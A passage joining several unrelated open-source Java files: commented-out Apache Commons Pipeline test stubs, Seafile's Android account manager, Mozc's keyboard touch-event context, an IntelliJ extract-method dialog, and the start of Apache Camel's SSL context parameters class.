org.apache.commons.pipeline.Pipeline. // */ // public void testGetStages() { // System.out.println("getStages"); // // Pipeline instance = new Pipeline(); // // List<Stage> expResult = null; // List<Stage> result = instance.getStages(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getStageDriver method, of class org.apache.commons.pipeline.Pipeline. 
// */ // public void testGetStageDriver() { // System.out.println("getStageDriver"); // // Stage stage = null; // Pipeline instance = new Pipeline(); // // StageDriver expResult = null; // StageDriver result = instance.getStageDriver(stage); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getStageDrivers method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetStageDrivers() { // System.out.println("getStageDrivers"); // // Pipeline instance = new Pipeline(); // // List<StageDriver> expResult = null; // List<StageDriver> result = instance.getStageDrivers(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of addBranch method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testAddBranch() throws Exception { // System.out.println("addBranch"); // // String key = ""; // Pipeline branch = null; // Pipeline instance = new Pipeline(); // // instance.addBranch(key, branch); // // fail("The test case is a prototype."); // } // // /** // * Test of getBranches method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetBranches() { // System.out.println("getBranches"); // // Pipeline instance = new Pipeline(); // // Map<String, Pipeline> expResult = null; // Map<String, Pipeline> result = instance.getBranches(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getSourceFeeder method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetSourceFeeder() { // System.out.println("getSourceFeeder"); // // Pipeline instance = new Pipeline(); // // Feeder expResult = null; // Feeder result = instance.getSourceFeeder(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of getTerminalFeeder method, of class org.apache.commons.pipeline.Pipeline. 
// */ // public void testGetTerminalFeeder() { // System.out.println("getTerminalFeeder"); // // Pipeline instance = new Pipeline(); // // Feeder expResult = null; // Feeder result = instance.getTerminalFeeder(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of setTerminalFeeder method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testSetTerminalFeeder() { // System.out.println("setTerminalFeeder"); // // Feeder terminalFeeder = null; // Pipeline instance = new Pipeline(); // // instance.setTerminalFeeder(terminalFeeder); // // fail("The test case is a prototype."); // } // // /** // * Test of start method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testStart() throws Exception { // System.out.println("start"); // // Pipeline instance = new Pipeline(); // // instance.start(); // // fail("The test case is a prototype."); // } // // /** // * Test of finish method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testFinish() throws Exception { // System.out.println("finish"); // // Pipeline instance = new Pipeline(); // // instance.finish(); // // fail("The test case is a prototype."); // } // // /** // * Test of run method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testRun() { // System.out.println("run"); // // Pipeline instance = new Pipeline(); // // instance.run(); // // fail("The test case is a prototype."); // } // // /** // * Test of getValidator method, of class org.apache.commons.pipeline.Pipeline. // */ // public void testGetValidator() { // System.out.println("getValidator"); // // Pipeline instance = new Pipeline(); // // PipelineValidator expResult = null; // PipelineValidator result = instance.getValidator(); // assertEquals(expResult, result); // // fail("The test case is a prototype."); // } // // /** // * Test of setValidator method, of class org.apache.commons.pipeline.Pipeline. 
// */ // public void testSetValidator() { // System.out.println("setValidator"); // // PipelineValidator validator = null; // Pipeline instance = new Pipeline(); // // instance.setValidator(validator); // // fail("The test case is a prototype."); // } }
package com.seafile.seadroid2.account; import java.lang.reflect.Array; import java.util.ArrayList; import java.util.List; import android.content.Context; import android.content.Intent; import android.content.SharedPreferences; import com.seafile.seadroid2.SettingsManager; import com.seafile.seadroid2.cameraupload.CameraUploadService; import com.seafile.seadroid2.util.Utils; import org.json.JSONException; import org.json.JSONObject; /** * Account Manager.<br> * note the differences between {@link Account} and {@link AccountInfo}<br> * */ import com.google.common.collect.Lists; public class AccountManager { @SuppressWarnings("unused") private static String DEBUG_TAG = "AccountManager"; public static final String SHARED_PREF_NAME = "latest_account"; public static final String SHARED_PREF_SERVER_KEY = "com.seafile.seadroid.server"; public static final String SHARED_PREF_EMAIL_KEY = "com.seafile.seadroid.email"; public static final String SHARED_PREF_TOKEN_KEY = "com.seafile.seadroid.token"; public static final String INVALID_TOKEN = "not_applicable"; /** used to manage multi Accounts when user switch between different Accounts */ private SharedPreferences actMangeSharedPref; private SharedPreferences.Editor editor; private final AccountDBHelper dbHelper; private Context ctx; public AccountManager(Context context) { this.ctx = context; dbHelper = AccountDBHelper.getDatabaseHelper(context); // used to manage multi Accounts when user switch between different Accounts actMangeSharedPref = ctx.getSharedPreferences(SHARED_PREF_NAME, Context.MODE_PRIVATE); editor = actMangeSharedPref.edit(); } public Account getAccountBySignature(String signature) { List<Account> accounts = dbHelper.getAccountList(); for (int i = 0; i < accounts.size(); ++i) { if (signature.equals(accounts.get(i).getSignature())) { return accounts.get(i); } } return null; } public List<Account> getAccountList() { return dbHelper.getAccountList(); } /** * save sign in account to database * * @param account */ 
public void saveAccountToDB(Account account) { // save to db dbHelper.saveAccount(account); } /** * update account info from database * * @param oldAccount * @param newAccount */ public void updateAccountFromDB(Account oldAccount, Account newAccount) { dbHelper.updateAccount(oldAccount, newAccount); } public Account getCurrentAccount() { String currentServer = actMangeSharedPref.getString(SHARED_PREF_SERVER_KEY, null); String currentEmail = actMangeSharedPref.getString(SHARED_PREF_EMAIL_KEY, null); String currentToken = actMangeSharedPref.getString(SHARED_PREF_TOKEN_KEY, null); // When user sign out, the value of token will be null, then leads user to AccountsActivity if (currentServer != null && currentToken != null) { return new Account(currentServer, currentEmail, null, currentToken); } else return null; } /** * save current Account info to SharedPreference<br> * <strong>current</strong> means the Account is now in using at the foreground if has multiple accounts * * @param account */ public void saveCurrentAccount(Account account) { editor.putString(SHARED_PREF_SERVER_KEY, account.server); editor.putString(SHARED_PREF_EMAIL_KEY, account.email); editor.putString(SHARED_PREF_TOKEN_KEY, account.token); editor.commit(); } /** * delete a selected Account info from SharedPreference * * @param account */ public void deleteAccountFromSharedPreference(Account account) { String currentServer = actMangeSharedPref.getString(SHARED_PREF_SERVER_KEY, null); String currentEmail = actMangeSharedPref.getString(SHARED_PREF_EMAIL_KEY, null); if (account.server.equals(currentServer) && account.email.equals(currentEmail)) { editor.putString(SHARED_PREF_SERVER_KEY, null); editor.putString(SHARED_PREF_EMAIL_KEY, null); editor.putString(SHARED_PREF_TOKEN_KEY, null); editor.commit(); } } public void deleteCameraUploadSettingsByAccount(Account account) { // update cache data of settings module String settingsServer = 
actMangeSharedPref.getString(SettingsManager.SHARED_PREF_CAMERA_UPLOAD_ACCOUNT_SERVER, null); String settingsEmail = actMangeSharedPref.getString(SettingsManager.SHARED_PREF_CAMERA_UPLOAD_ACCOUNT_EMAIL, null); if (account.server.equals(settingsServer) && account.email.equals(settingsEmail)) { SettingsManager.instance().clearCameraUploadInfo(); } } public void deleteAccountFromDB(Account account) { // delete from db dbHelper.deleteAccount(account); } /** * when user sign out, delete authorized information of the current Account instance.<br> * If Camera Upload Service is running under the Account, stop the service. * */ public void signOutCurrentAccount() { Account currentAccount = getCurrentAccount(); // delete token of the account from database Account accountWithoutToken = new Account(currentAccount.getServer(), currentAccount.getEmail(), null, INVALID_TOKEN); updateAccountFromDB(currentAccount, accountWithoutToken); // delete data in Shared_prefs deleteAccountFromSharedPreference(currentAccount); // stop camera upload service if on stopCamerUploadServiceByAccount(currentAccount); // keep Gesture lock settings } /** * turn off camera upload service of the deleted account if it was turned on before * * @param account */ public void stopCamerUploadServiceByAccount(Account account) { String camerUploadEmail = SettingsManager.instance().getCameraUploadAccountEmail(); String cameraUploadServer = SettingsManager.instance().getCameraUploadAccountServer(); if (camerUploadEmail == null) { return; } // stop camera upload service if (camerUploadEmail.equals(account.getEmail()) && cameraUploadServer.equals(account.getServer())) { Intent cameraUploadIntent = new Intent(ctx, CameraUploadService.class); ctx.stopService(cameraUploadIntent); } } /** * parse JSON format data * * @param accountInfo * @return AccountInfo * @throws JSONException */ public AccountInfo parseAccountInfo(String accountInfo) throws JSONException { JSONObject obj = Utils.parseJsonObject(accountInfo); if 
(obj == null) return null; return AccountInfo.fromJson(obj); } /** * get all email texts from database in order to auto complete email address * * @return */ public ArrayList<String> getAccountAutoCompleteTexts() { ArrayList<String> autoCompleteTexts = Lists.newArrayList(); List<Account> accounts = dbHelper.getAccountList(); if (accounts == null) return null; for (Account act : accounts) { if (!autoCompleteTexts.contains(act.getEmail())) autoCompleteTexts.add(act.getEmail()); } return autoCompleteTexts; } }
// Copyright 2010-2015, Google Inc. // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.mozc.android.inputmethod.japanese.keyboard;

import org.mozc.android.inputmethod.japanese.keyboard.KeyState.MetaState;
import org.mozc.android.inputmethod.japanese.protobuf.ProtoCommands.Input.TouchAction;
import org.mozc.android.inputmethod.japanese.protobuf.ProtoCommands.Input.TouchEvent;
import org.mozc.android.inputmethod.japanese.protobuf.ProtoCommands.Input.TouchPosition;

import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Optional;
import com.google.common.base.Preconditions;

import java.util.Set;

/**
 * This class represents user's one action, e.g., the sequence of:
 * press -> move -> move -> ... -> move -> release.
 *
 * For user's multi touch events, multiple instances will be instantiated.
 * E.g. for user's two finger strokes, two instances will be instantiated.
 */
public class KeyEventContext {

  /** The key on which this touch sequence started. */
  final Key key;

  /** Pointer (finger) id of this stroke, used to track multi-touch strokes separately. */
  final int pointerId;

  // Coordinates of the initial touch-down position.
  private final float pressedX;
  private final float pressedY;

  // Squared distance the touch must travel from the press position before the
  // move is interpreted as a flick (compared against deltaX^2 + deltaY^2).
  private final float flickThresholdSquared;

  // True when 'key' has at least one non-center flick entry for the meta state
  // given at construction time (see isFlickable()).
  private final boolean isFlickableKey;

  // KeyState resolved for the meta state at press time; may be absent when the
  // key has no state for that meta state.
  private final Optional<KeyState> keyState;

  // Current flick direction; stays CENTER until the touch moves past the threshold.
  Flick.Direction flickDirection = Flick.Direction.CENTER;

  // TODO(hidehiko): Move logging code to an upper layer, e.g., MozcService or ViewManager etc.
  // after refactoring the architecture.
  private Optional<TouchAction> lastAction = Optional.absent();
  private float lastX;
  private float lastY;
  private long lastTimestamp;
  // Keyboard dimensions, used to normalize logged touch positions into [0, 1].
  private final int keyboardWidth;
  private final int keyboardHeight;

  // This variable will be updated in the callback of long press key event (if necessary).
  boolean pastLongPressSentTimeout = false;

  // Callback to be invoked for the long-press event; set via setLongPressCallback().
  Optional<Runnable> longPressCallback = Optional.absent();

  /**
   * Creates a context for a single pointer's stroke starting at
   * ({@code pressedX}, {@code pressedY}).
   *
   * @param key the pressed key; must not be null
   * @param pointerId pointer (finger) id for multi-touch tracking
   * @param pressedX x coordinate of the touch-down position
   * @param pressedY y coordinate of the touch-down position
   * @param keyboardWidth keyboard width used to normalize logged positions
   * @param keyboardHeight keyboard height used to normalize logged positions
   * @param flickThresholdSquared squared distance beyond which a move becomes a flick
   * @param metaState meta states active at press time; must not be null
   */
  public KeyEventContext(Key key, int pointerId, float pressedX, float pressedY,
                         int keyboardWidth, int keyboardHeight, float flickThresholdSquared,
                         Set<MetaState> metaState) {
    Preconditions.checkNotNull(key);
    Preconditions.checkNotNull(metaState);
    this.key = key;
    this.pressedX = pressedX;
    this.pressedY = pressedY;
    this.flickThresholdSquared = flickThresholdSquared;
    this.isFlickableKey = isFlickable(key, metaState);
    this.keyState = key.getKeyState(metaState);
    this.pointerId = pointerId;
    this.keyboardWidth = keyboardWidth;
    this.keyboardHeight = keyboardHeight;
  }

  /** Returns the squared flick-detection threshold given at construction time. */
  float getFlickThresholdSquared() {
    return flickThresholdSquared;
  }

  /**
   * Returns true iff the point ({@code x}, {@code y}) is contained by the {@code key}'s region.
   */
  @VisibleForTesting
  static boolean isContained(float x, float y, Key key) {
    float relativeX = x - key.getX();
    float relativeY = y - key.getY();
    return 0 <= relativeX && relativeX < key.getWidth()
        && 0 <= relativeY && relativeY < key.getHeight();
  }

  /**
   * Returns true iff the key is flickable, i.e. it has at least one flick entry
   * in a non-center direction for the given meta state. Otherwise returns false.
   */
  @VisibleForTesting
  static boolean isFlickable(Key key, Set<MetaState> metaState) {
    Preconditions.checkNotNull(key);
    Preconditions.checkNotNull(metaState);
    Optional<KeyState> optionalKeyState = key.getKeyState(metaState);
    if (!optionalKeyState.isPresent()) {
      return false;
    }
    KeyState keyState = optionalKeyState.get();
    return keyState.getFlick(Flick.Direction.LEFT).isPresent()
        || keyState.getFlick(Flick.Direction.UP).isPresent()
        || keyState.getFlick(Flick.Direction.RIGHT).isPresent()
        || keyState.getFlick(Flick.Direction.DOWN).isPresent();
  }

  /**
   * Returns the key entity corresponding to {@code metaState} and {@code direction},
   * or absent for spacer keys or when no entity matches.
   */
  public static Optional<KeyEntity> getKeyEntity(Key key, Set<MetaState> metaState,
                                                 Optional<Flick.Direction> direction) {
    Preconditions.checkNotNull(key);
    Preconditions.checkNotNull(metaState);
    Preconditions.checkNotNull(direction);
    if (key.isSpacer()) {
      return Optional.absent();
    }
    // A non-spacer key has at least one KeyState available, so get() is expected
    // to be safe here.
    return getKeyEntityInternal(key.getKeyState(metaState).get(), direction);
  }

  // Resolves the entity for the given direction using this context's own keyState.
  private Optional<KeyEntity> getKeyEntity(Flick.Direction direction) {
    return keyState.isPresent()
        ? getKeyEntityInternal(keyState.get(), Optional.of(direction))
        : Optional.<KeyEntity>absent();
  }

  // Shared lookup: maps (keyState, direction) to the flick's key entity, if any.
  private static Optional<KeyEntity> getKeyEntityInternal(KeyState keyState,
                                                          Optional<Flick.Direction> direction) {
    Preconditions.checkNotNull(keyState);
    Preconditions.checkNotNull(direction);
    if (!direction.isPresent()) {
      return Optional.absent();
    }
    Optional<Flick> flick = keyState.getFlick(direction.get());
    return flick.isPresent()
        ? Optional.of(flick.get().getKeyEntity())
        : Optional.<KeyEntity>absent();
  }

  /**
   * Returns the key code to be sent via {@link KeyboardActionListener#onKey(int, java.util.List)}.
   * <p>
   * If {@code keyEntity} doesn't trigger longpress by timeout (isLongPressTimeoutTrigger is false),
   * the result depends on whether the long-press timeout has already passed.
   */
  public int getKeyCode() {
    Optional<KeyEntity> keyEntity = getKeyEntity(flickDirection);
    if (!keyEntity.isPresent()
        || (pastLongPressSentTimeout && keyEntity.get().isLongPressTimeoutTrigger())) {
      // If the long-press-key event is already sent, just return INVALID_KEY_CODE.
      return KeyEntity.INVALID_KEY_CODE;
    }
    // For non-timeout-trigger entities with a valid long-press code, send that code
    // once the timeout has passed; otherwise send the plain key code.
    return !keyEntity.get().isLongPressTimeoutTrigger()
        && keyEntity.get().getLongPressKeyCode() != KeyEntity.INVALID_KEY_CODE
        && pastLongPressSentTimeout
        ? keyEntity.get().getLongPressKeyCode()
        : keyEntity.get().getKeyCode();
  }

  /**
   * Returns the meta states that should be active after this key event,
   * leaving non-modifier keys' meta state untouched.
   */
  Set<MetaState> getNextMetaStates(Set<MetaState> originalMetaStates) {
    Preconditions.checkNotNull(originalMetaStates);
    if (!key.isModifier() || key.isSpacer()) {
      // Non-modifier key shouldn't change meta state.
      return originalMetaStates;
    }
    // NOTE(review): keyState.get() assumes a modifier non-spacer key always has a
    // key state for the pressed meta state — confirm against keyboard definitions.
    return keyState.get().getNextMetaStates(originalMetaStates);
  }

  /**
   * Returns the key code to be sent for long press event.
   */
  int getLongPressKeyCode() {
    if (pastLongPressSentTimeout) {
      // If the long-press-key event is already sent, just return INVALID_KEY_CODE.
      return KeyEntity.INVALID_KEY_CODE;
    }
    // Note that we always use CENTER flick direction for long press key events.
    Optional<KeyEntity> keyEntity = getKeyEntity(Flick.Direction.CENTER);
    return keyEntity.isPresent()
        ? keyEntity.get().getLongPressKeyCode()
        : KeyEntity.INVALID_KEY_CODE;
  }

  /** Returns true when the center entity (if any) triggers long-press by timeout. */
  boolean isLongPressTimeoutTrigger() {
    Optional<KeyEntity> keyEntity = getKeyEntity(Flick.Direction.CENTER);
    return !keyEntity.isPresent() || keyEntity.get().isLongPressTimeoutTrigger();
  }

  /**
   * Returns the key code to be sent via {@link KeyboardActionListener#onPress(int)} and
   * {@link KeyboardActionListener#onRelease(int)}.
   */
  public int getPressedKeyCode() {
    Optional<KeyEntity> keyEntity = getKeyEntity(Flick.Direction.CENTER);
    return keyEntity.isPresent() ? keyEntity.get().getKeyCode() : KeyEntity.INVALID_KEY_CODE;
  }

  /**
   * Returns true if this key event sequence represents toggling meta state.
   */
  boolean isMetaStateToggleEvent() {
    return !pastLongPressSentTimeout
        && key.isModifier()
        && flickDirection == Flick.Direction.CENTER;
  }

  /**
   * Returns the pop up data for the current state, or absent once the
   * long-press event has been sent.
   */
  Optional<PopUp> getCurrentPopUp() {
    if (pastLongPressSentTimeout) {
      return Optional.absent();
    }
    Optional<KeyEntity> keyEntity = getKeyEntity(flickDirection);
    return keyEntity.isPresent() ? keyEntity.get().getPopUp() : Optional.<PopUp>absent();
  }

  /**
   * Updates the internal state of this context when the touched position is moved to
   * {@code (x, y)} at time {@code timestamp} in milliseconds since the press.
   *
   * @return {@code true} if the internal state (the flick direction) is actually updated.
   */
  public boolean update(float x, float y, TouchAction touchAction, long timestamp) {
    // Remember the latest raw event so getTouchEvent() can log the full stroke.
    lastAction = Optional.of(touchAction);
    Flick.Direction originalDirection = flickDirection;
    lastX = x;
    lastY = y;
    lastTimestamp = timestamp;

    float deltaX = x - pressedX;
    float deltaY = y - pressedY;
    if (deltaX * deltaX + deltaY * deltaY < flickThresholdSquared
        || !isFlickableKey && isContained(x, y, key)) {
      // A user touches (or returns back to) the same key, so we don't fire flick.
      // If the key isn't flickable, we also look at the key's region to avoid unexpected
      // cancellation.
      flickDirection = Flick.Direction.CENTER;
    } else {
      if (Math.abs(deltaX) < Math.abs(deltaY)) {
        // Vertical flick
        flickDirection = deltaY < 0 ? Flick.Direction.UP : Flick.Direction.DOWN;
      } else {
        // Horizontal flick
        flickDirection = deltaX > 0 ? Flick.Direction.RIGHT : Flick.Direction.LEFT;
      }
    }

    if (flickDirection == originalDirection) {
      return false;
    } else {
      // If flickDirection has been updated, reset pastLongPressSentTimeout flag
      // so that long-press event can be sent again.
      // This happens when
      //   [Hold 'q' key]
      //   -> [Popup '1' is shown as the result of long-press]
      //   -> [Flick outside to dismiss the popup]
      //   -> [Flick again to the center position and hold]
      //   -> [Popup '1' is shown again as the result of long-press]
      pastLongPressSentTimeout = false;
      return true;
    }
  }

  /**
   * @return {@code TouchEvent} instance which includes the stroke related to this context,
   *         or absent when no key entity matches the current flick direction.
   */
  public Optional<TouchEvent> getTouchEvent() {
    Optional<KeyEntity> keyEntity = getKeyEntity(flickDirection);
    if (!keyEntity.isPresent()) {
      return Optional.absent();
    }
    TouchEvent.Builder builder = TouchEvent.newBuilder()
        .setSourceId(keyEntity.get().getSourceId());
    // First stroke entry is always the original touch-down position (timestamp 0).
    builder.addStroke(createTouchPosition(
        TouchAction.TOUCH_DOWN, pressedX, pressedY, keyboardWidth, keyboardHeight, 0));
    if (lastAction.isPresent()) {
      builder.addStroke(createTouchPosition(
          lastAction.get(), lastX, lastY, keyboardWidth, keyboardHeight, lastTimestamp));
    }
    return Optional.of(builder.build());
  }

  /**
   * Builds a {@code TouchPosition} with coordinates normalized by the
   * keyboard dimensions (x/width, y/height).
   */
  public static TouchPosition createTouchPosition(
      TouchAction action, float x, float y, int width, int height, long timestamp) {
    return TouchPosition.newBuilder()
        .setAction(action)
        .setX(x / width)
        .setY(y / height)
        .setTimestamp(timestamp)
        .build();
  }

  /** Registers the callback to run for this context's long-press event. */
  public void setLongPressCallback(Runnable longPressCallback) {
    this.longPressCallback = Optional.of(longPressCallback);
  }
}
/* * Copyright 2000-2013 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.refactoring.extractMethod; import com.intellij.codeInsight.codeFragment.CodeFragment; import com.intellij.openapi.application.ApplicationManager; import com.intellij.openapi.fileTypes.FileType; import com.intellij.openapi.project.Project; import com.intellij.openapi.ui.DialogWrapper; import com.intellij.openapi.ui.Messages; import com.intellij.refactoring.RefactoringBundle; import com.intellij.refactoring.ui.ComboBoxVisibilityPanel; import com.intellij.refactoring.ui.MethodSignatureComponent; import com.intellij.refactoring.util.AbstractVariableData; import com.intellij.refactoring.util.SimpleParameterTablePanel; import com.intellij.ui.DocumentAdapter; import com.intellij.util.containers.HashMap; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import javax.swing.*; import javax.swing.event.DocumentEvent; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Map; public class AbstractExtractMethodDialog<T> extends DialogWrapper implements ExtractMethodSettings<T> { private JPanel myContentPane; private SimpleParameterTablePanel myParametersPanel; private JTextField myMethodNameTextField; private MethodSignatureComponent mySignaturePreviewTextArea; private JTextArea myOutputVariablesTextArea; private ComboBoxVisibilityPanel<T> myVisibilityComboBox; private final Project myProject; private 
final String myDefaultName; private final ExtractMethodValidator myValidator; private final ExtractMethodDecorator<T> myDecorator; private AbstractVariableData[] myVariableData; private Map<String, AbstractVariableData> myVariablesMap; private final List<String> myArguments; private final ArrayList<String> myOutputVariables; private final FileType myFileType; public AbstractExtractMethodDialog(final Project project, final String defaultName, final CodeFragment fragment, final T[] visibilityVariants, final ExtractMethodValidator validator, final ExtractMethodDecorator<T> decorator, final FileType type) { super(project, true); myProject = project; myDefaultName = defaultName; myValidator = validator; myDecorator = decorator; myFileType = type; myVisibilityComboBox = new ComboBoxVisibilityPanel<>(visibilityVariants); myVisibilityComboBox.setVisible(visibilityVariants.length > 1); $$$setupUI$$$(); myArguments = new ArrayList<>(fragment.getInputVariables()); Collections.sort(myArguments); myOutputVariables = new ArrayList<>(fragment.getOutputVariables()); Collections.sort(myOutputVariables); setModal(true); setTitle(RefactoringBundle.message("extract.method.title")); init(); } private void $$$setupUI$$$() { } @Override protected void init() { super.init(); // Set default name and select it myMethodNameTextField.setText(myDefaultName); myMethodNameTextField.setSelectionStart(0); myMethodNameTextField.setSelectionStart(myDefaultName.length()); myMethodNameTextField.getDocument().addDocumentListener(new DocumentAdapter() { @Override protected void textChanged(DocumentEvent e) { updateOutputVariables(); updateSignature(); updateOkStatus(); } }); myVariableData = createVariableDataByNames(myArguments); myVariablesMap = createVariableMap(myVariableData); myParametersPanel.init(myVariableData); updateOutputVariables(); updateSignature(); updateOkStatus(); } @Override public JComponent getPreferredFocusedComponent() { return myMethodNameTextField; } public static 
AbstractVariableData[] createVariableDataByNames(final List<String> args) { final AbstractVariableData[] datas = new AbstractVariableData[args.size()]; for (int i = 0; i < args.size(); i++) { final AbstractVariableData data = new AbstractVariableData(); final String name = args.get(i); data.originalName = name; data.name = name; data.passAsParameter = true; datas[i] = data; } return datas; } public static Map<String, AbstractVariableData> createVariableMap(final AbstractVariableData[] data) { final HashMap<String, AbstractVariableData> map = new HashMap<>(); for (AbstractVariableData variableData : data) { map.put(variableData.getOriginalName(), variableData); } return map; } @NotNull @Override protected Action[] createActions() { return new Action[]{getOKAction(), getCancelAction(), getHelpAction()}; } @Override protected void doOKAction() { final String error = myValidator.check(getMethodName()); if (error != null){ if (ApplicationManager.getApplication().isUnitTestMode()){ Messages.showInfoMessage(error, RefactoringBundle.message("error.title")); return; } if (Messages.showOkCancelDialog(error + ". 
" + RefactoringBundle.message("do.you.wish.to.continue"), RefactoringBundle.message("warning.title"), Messages.getWarningIcon()) != Messages.OK){ return; } } super.doOKAction(); } @Override protected String getHelpId() { return "refactoring.extractMethod"; } @Override protected JComponent createCenterPanel() { return myContentPane; } private void createUIComponents() { myParametersPanel = new SimpleParameterTablePanel(myValidator::isValidName) { @Override protected void doCancelAction() { AbstractExtractMethodDialog.this.doCancelAction(); } @Override protected void doEnterAction() { doOKAction(); } @Override protected void updateSignature() { updateOutputVariables(); AbstractExtractMethodDialog.this.updateSignature(); } }; mySignaturePreviewTextArea = new MethodSignatureComponent("", myProject, myFileType); } private void updateOutputVariables() { final StringBuilder builder = new StringBuilder(); boolean first = true; for (String variable : myOutputVariables) { if (myVariablesMap!=null){ final AbstractVariableData data = myVariablesMap.get(variable); final String outputName = data != null ? data.getName() : variable; if (first){ first = false; } else { builder.append(", "); } builder.append(outputName); } } myOutputVariablesTextArea.setText(builder.length() > 0 ? builder.toString() : RefactoringBundle.message("refactoring.extract.method.dialog.empty")); } private void updateSignature() { mySignaturePreviewTextArea.setSignature(myDecorator.createMethodSignature(this)); } private void updateOkStatus() { setOKActionEnabled(myValidator.isValidName(getMethodName())); } @NotNull @Override public String getMethodName() { return myMethodNameTextField.getText().trim(); } @NotNull @Override public AbstractVariableData[] getAbstractVariableData() { return myVariableData; } @Nullable @Override public T getVisibility() { return myVisibilityComboBox.getVisibility(); } }
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.camel.util.jsse; import java.io.IOException; import java.net.InetAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.UnknownHostException; import java.security.GeneralSecurityException; import java.security.KeyManagementException; import java.security.SecureRandom; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.LinkedList; import java.util.List; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.net.ssl.KeyManager; import javax.net.ssl.SSLContext; import javax.net.ssl.SSLContextSpi; import javax.net.ssl.SSLEngine; import javax.net.ssl.SSLServerSocket; import javax.net.ssl.SSLServerSocketFactory; import javax.net.ssl.SSLSessionContext; import javax.net.ssl.SSLSocket; import javax.net.ssl.SSLSocketFactory; import javax.net.ssl.TrustManager; import org.apache.camel.util.jsse.FilterParameters.Patterns; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import static org.apache.camel.util.CollectionHelper.collectionAsCommaDelimitedString; /** * Represents configuration options that can be applied in the client-side * or server-side context 
depending on what they are applied to. */ public abstract class BaseSSLContextParameters extends JsseParameters { protected static final List<String> DEFAULT_CIPHER_SUITES_FILTER_INCLUDE = Collections.unmodifiableList(Arrays.asList(".*")); protected static final List<String> DEFAULT_CIPHER_SUITES_FILTER_EXCLUDE = Collections.unmodifiableList(Arrays.asList(".*_NULL_.*", ".*_anon_.*")); protected static final List<String> DEFAULT_SECURE_SOCKET_PROTOCOLS_FILTER_INCLUDE = Collections.unmodifiableList(Arrays.asList(".*")); private static final Logger LOG = LoggerFactory.getLogger(BaseSSLContextParameters.class); private static final String LS = System.getProperty("line.separator"); private static final String SSL_ENGINE_CIPHER_SUITE_LOG_MSG = createCipherSuiteLogMessage("SSLEngine"); private static final String SSL_SOCKET_CIPHER_SUITE_LOG_MSG = createCipherSuiteLogMessage("SSLSocket"); private static final String SSL_SERVER_SOCKET_CIPHER_SUITE_LOG_MSG = createCipherSuiteLogMessage("SSLServerSocket"); private static final String SSL_ENGINE_PROTOCOL_LOG_MSG = createProtocolLogMessage("SSLEngine"); private static final String SSL_SOCKET_PROTOCOL_LOG_MSG = createProtocolLogMessage("SSLSocket"); private static final String SSL_SERVER_SOCKET_PROTOCOL_LOG_MSG = createProtocolLogMessage("SSLServerSocket"); /** * The optional explicitly configured cipher suites for this configuration. */ private CipherSuitesParameters cipherSuites; /** * The optional cipher suite filter configuration for this configuration. */ private FilterParameters cipherSuitesFilter; /** * The optional explicitly configured secure socket protocol names for this configuration. */ private SecureSocketProtocolsParameters secureSocketProtocols; /** * The option secure socket protocol name filter configuration for this configuration. */ private FilterParameters secureSocketProtocolsFilter; /** * The optional {@link SSLSessionContext} timeout time for {@link javax.net.ssl.SSLSession}s in 